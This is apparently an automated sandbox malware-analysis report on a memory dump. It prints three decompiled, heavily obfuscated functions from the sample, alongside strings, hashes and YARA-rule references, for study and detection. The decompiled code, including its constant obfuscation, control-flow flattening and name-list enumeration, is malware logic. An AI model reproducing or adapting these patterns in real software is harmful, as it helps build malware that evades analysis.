m , xrefs: 002213C0, 0022170F, 002216F0, 00221659

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m $+$IP$j_$k$ld8$n2$B
API String ID: 0-4100556268
Opcode ID: d28aee102e9f4b56b77d3a943180a8ad0ce8534ea53d9b13a48bed408c476c16
Instruction ID: 0b3e0cab64a7b8c0dac2eba3a10d2363500449211e8487df10ee4a673d60f11e
Opcode Fuzzy Hash: d28aee102e9f4b56b77d3a943180a8ad0ce8534ea53d9b13a48bed408c476c16
Instruction Fuzzy Hash: CAB14E71018381AFD368CF61D98991FBBF1BBC4758F508A1EF196862A0C7B58A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0021B75F, Relevance: 10.2, Strings: 8, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0021B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E0021E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E0022889D(0x22c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00223EB3(_v52, _t241, _t218, _v76, _v56, 0x22c9d0, _v80, _v28, 0x22c9d0, _v84, 0x22c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00222025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E002165A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x22ca2c; // 0x558300
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x0021b75f
0x0021b762
0x0021b76c
0x0021b776
0x0021b77e
0x0021b786
0x0021b78e
0x0021b793
0x0021b798
0x0021b7a0
0x0021b7a7
0x0021b7ae
0x0021b7b2
0x0021b7be
0x0021b7c2
0x0021b7c7
0x0021b7cf
0x0021b7d7
0x0021b7df
0x0021b7e7
0x0021b7f6
0x0021b7f9
0x0021b805
0x0021b809
0x0021b811
0x0021b819
0x0021b826
0x0021b829
0x0021b82d
0x0021b835
0x0021b83d
0x0021b84d
0x0021b851
0x0021b859
0x0021b865
0x0021b86a
0x0021b870
0x0021b875
0x0021b87d
0x0021b885
0x0021b891
0x0021b896
0x0021b89c
0x0021b8a4
0x0021b8b1
0x0021b8b2
0x0021b8b6
0x0021b8be
0x0021b8c6
0x0021b8ce
0x0021b8dc
0x0021b8e0
0x0021b8e5
0x0021b8ed
0x0021b903
0x0021b906
0x0021b90a
0x0021b90e
0x0021b916
0x0021b926
0x0021b92a
0x0021b92f
0x0021b937
0x0021b93f
0x0021b94b
0x0021b950
0x0021b956
0x0021b95e
0x0021b966
0x0021b96b
0x0021b970
0x0021b978
0x0021b980
0x0021b989
0x0021b98c
0x0021b990
0x0021b998
0x0021b9a0
0x0021b9a8
0x0021b9ad
0x0021b9b2
0x0021b9ba
0x0021b9c2
0x0021b9ca
0x0021b9d2
0x0021b9da
0x0021b9e2
0x0021b9ea
0x0021b9f2
0x0021b9f7
0x0021b9ff
0x0021ba07
0x0021ba07
0x0021ba09
0x0021ba0a
0x0021ba0f
0x0021ba0f
0x0021ba19
0x0021bae9
0x0021baf0
0x0021baf3
0x0021baf5
0x0021bafd
0x00000000
0x0021ba1f
0x0021ba25
0x0021ba67
0x0021ba74
0x0021ba79
0x0021baaf
0x0021bac8
0x0021bacb
0x0021bad0
0x0021bad5
0x0021bb24
0x0021bb24
0x00000000
0x0021ba27
0x0021ba2d
0x0021ba63
0x00000000
0x0021ba2f
0x0021ba35
0x00000000
0x0021ba3b
0x0021ba4f
0x0021ba54
0x0021ba35
0x0021ba2d
0x0021ba25
0x0021ba57
0x0021ba62
0x0021ba62
0x0021bb06
0x0021bb0c
0x0021bb17
0x0021bb17
0x0021bb1a
0x00000000
0x00000000
0x0021bb14
0x0021bb14
0x0021bb14
0x0021bb1c
0x0021bb1c
0x0021bb1f
0x00000000
0x0021bb29
0x0021bb29
0x0021bb29
0x00000000
0x0021bb35

Strings

(%, xrefs: 0021B835
AP, xrefs: 0021B7CF
xq, xrefs: 0021B978
R\, xrefs: 0021B990
O1d#, xrefs: 0021BB1F
Cw, xrefs: 0021B9D2
O1d#, xrefs: 0021BA1F
,^, xrefs: 0021B8E5

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
API String ID: 0-1090126677
Opcode ID: f3977c8cabcbacef237a272ae487065afcc69e5313c5add5492a9feafb494793
Instruction ID: 13f47ce2b1d6c1aaa2fde6ad321897d9df65a19cc79562d92627e7815cfa5d13
Opcode Fuzzy Hash: f3977c8cabcbacef237a272ae487065afcc69e5313c5add5492a9feafb494793
Instruction Fuzzy Hash: 8AA132715093409BE359CF64D98A81FBBF2BBD4B48F10491DF185862A0D7B9CA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0021EA4C, Relevance: 10.2, Strings: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0021EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0021602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00218736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E002259A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E002259A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}

0x0021ea50
0x0021ea57
0x0021ea5b
0x0021ea5d
0x0021ea5e
0x0021ea62
0x0021ea66
0x0021ea68
0x0021ea6d
0x0021ea75
0x0021ea77
0x0021ea7b
0x0021ea7e
0x0021ea88
0x0021ea90
0x0021ea95
0x0021ea9a
0x0021eaa2
0x0021eaaa
0x0021eab2
0x0021eab7
0x0021eac6
0x0021eac9
0x0021eacd
0x0021ead5
0x0021eadd
0x0021eae2
0x0021eaea
0x0021eaf2
0x0021eafa
0x0021eb0a
0x0021eb0e
0x0021eb16
0x0021eb1e
0x0021eb22
0x0021eb27
0x0021eb2f
0x0021eb37
0x0021eb3f
0x0021eb4c
0x0021eb4d
0x0021eb51
0x0021eb59
0x0021eb61
0x0021eb6f
0x0021eb73
0x0021eb7b
0x0021eb88
0x0021eb8c
0x0021eb94
0x0021eb9c
0x0021eba4
0x0021ebb1
0x0021ebb5
0x0021ebbd
0x0021ebc5
0x0021ebcd
0x0021ebd5
0x0021ebe2
0x0021ebe6
0x0021ebee
0x0021ebf6
0x0021ebfe
0x0021ec06
0x0021ec10
0x0021ec15
0x0021ec1d
0x0021ec25
0x0021ec2d
0x0021ec35
0x0021ec3a
0x0021ec42
0x0021ec50
0x0021ec55
0x0021ec5b
0x0021ec60
0x0021ec68
0x0021ec70
0x0021ec78
0x0021ec84
0x0021ec89
0x0021ec8f
0x0021ec97
0x0021eca3
0x0021eca8
0x0021ecae
0x0021ecb6
0x0021ecbe
0x0021ecca
0x0021eccf
0x0021ecd9
0x0021ece1
0x0021ecea
0x0021ecee
0x0021ecf6
0x0021ecf6
0x0021ed04
0x0021ed65
0x0021ed66
0x0021ed70
0x0021ed76
0x0021ed78
0x00000000
0x0021ed78
0x0021ed06
0x0021ed0c
0x0021ed46
0x0021ed4b
0x0021ed50
0x0021ed52
0x00000000
0x0021ed52
0x0021ed0e
0x0021ed14
0x00000000
0x0021ed1a
0x0021ed1a
0x00000000
0x0021ed1a
0x0021ed14
0x0021ed0c
0x00000000
0x0021ed04
0x0021eda3
0x0021edaf
0x0021edb2
0x0021edb4
0x0021edb9
0x0021edb9
0x0021edc6
0x0021edce

Strings

9v, xrefs: 0021EBCD
<q7, xrefs: 0021EBC5
dR, xrefs: 0021EC60
--0, xrefs: 0021EA90
n, xrefs: 0021EA88
)?, xrefs: 0021EC42
--0, xrefs: 0021ED0E
T8T, xrefs: 0021EB51

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: n$)?$9v$<q7$dR$--0$--0$T8T
API String ID: 0-1820671589
Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction ID: d5ce6e57e1003a40147375f1b22d6b2f9d616aed34bac5de27ed2e9dfb411afe
Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction Fuzzy Hash: 349152714083419BD728CF61C98981FFBF1FBC9B58F404A1DF696862A0C3B68A558F47

Uniqueness

Uniqueness Score: -1.00%

Function 0022A0AF, Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0022A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E0021F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00216636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00220ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00225A61( &_v8, E00228D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00218736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00220ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E0021F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00225D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}

0x0022a0bd
0x0022a0be
0x0022a0c5
0x0022a0c6
0x0022a0c7
0x0022a0cc
0x0022a0d4
0x0022a0d7
0x0022a0e1
0x0022a0e6
0x0022a0eb
0x0022a0f3
0x0022a101
0x0022a106
0x0022a10c
0x0022a114
0x0022a119
0x0022a121
0x0022a129
0x0022a131
0x0022a139
0x0022a141
0x0022a149
0x0022a151
0x0022a15e
0x0022a161
0x0022a165
0x0022a16d
0x0022a175
0x0022a17d
0x0022a182
0x0022a18a
0x0022a192
0x0022a19a
0x0022a1a2
0x0022a1aa
0x0022a1b2
0x0022a1ba
0x0022a1c2
0x0022a1c7
0x0022a1d4
0x0022a1d8
0x0022a1e0
0x0022a1e8
0x0022a1f2
0x0022a1f5
0x0022a201
0x0022a205
0x0022a20d
0x0022a215
0x0022a21d
0x0022a225
0x0022a22d
0x0022a232
0x0022a23a
0x0022a242
0x0022a24a
0x0022a256
0x0022a259
0x0022a265
0x0022a268
0x0022a26f
0x0022a273
0x0022a27b
0x0022a283
0x0022a28b
0x0022a293
0x0022a29b
0x0022a2a3
0x0022a2a8
0x0022a2b0
0x0022a2b8
0x0022a2c0
0x0022a2c8
0x0022a2d0
0x0022a2d8
0x0022a2dd
0x0022a2e5
0x0022a2ea
0x0022a2f2
0x0022a2fa
0x0022a2ff
0x0022a307
0x0022a30f
0x0022a314
0x0022a319
0x0022a321
0x0022a329
0x0022a331
0x0022a339
0x0022a341
0x0022a349
0x0022a351
0x0022a359
0x0022a361
0x0022a369
0x0022a371
0x0022a37c
0x0022a384
0x0022a38c
0x0022a394
0x0022a39c
0x0022a3a4
0x0022a3a9
0x0022a3b1
0x0022a3b9
0x0022a3c1
0x0022a3c9
0x0022a3d1
0x0022a3d1
0x0022a3d1
0x0022a3d6
0x0022a3d6
0x0022a3d6
0x0022a3d6
0x0022a3dc
0x00000000
0x00000000
0x0022a3e2
0x0022a4cb
0x00000000
0x0022a3e8
0x0022a3ee
0x0022a592
0x0022a598
0x0022a59a
0x0022a59a
0x0022a5ad
0x0022a5b2
0x0022a5b6
0x0022a59a
0x0022a3f4
0x0022a3f6
0x0022a462
0x0022a466
0x0022a46a
0x0022a46c
0x0022a485
0x0022a494
0x0022a499
0x0022a49c
0x0022a4a0
0x0022a4a1
0x0022a4a6
0x0022a4a7
0x0022a4ad
0x0022a4b1
0x0022a4b1
0x0022a4b6
0x0022a4ba
0x0022a4bf
0x00000000
0x0022a3f8
0x0022a3fe
0x0022a450
0x0022a455
0x0022a458
0x0022a3d1
0x0022a3d1
0x0022a3d1
0x00000000
0x0022a3d1
0x0022a400
0x0022a406
0x00000000
0x0022a40c
0x0022a418
0x0022a419
0x0022a423
0x0022a425
0x0022a432
0x00000000
0x0022a432
0x0022a406
0x0022a3fe
0x0022a3f6
0x0022a3ee
0x0022a5ba
0x0022a5cf
0x0022a5cf
0x0022a4db
0x0022a543
0x0022a547
0x0022a549
0x0022a54f
0x0022a551
0x0022a55c
0x0022a561
0x0022a568
0x0022a56b
0x0022a56f
0x0022a573
0x0022a573
0x0022a578
0x0022a57f
0x00000000
0x0022a4dd
0x0022a4e3
0x0022a532
0x0022a539
0x00000000
0x0022a4e5
0x0022a4eb
0x00000000
0x0022a4f1
0x0022a4f1
0x0022a4f4
0x0022a511
0x0022a516
0x0022a519
0x0022a51b
0x0022a3d1
0x0022a3d1
0x0022a3d1
0x00000000
0x0022a3d1
0x0022a3d1
0x0022a4eb
0x0022a4e3
0x00000000
0x0022a584
0x0022a584
0x00000000
0x0022a590

Strings

V=, xrefs: 0022A394
2a, xrefs: 0022A3A9
_, xrefs: 0022A151
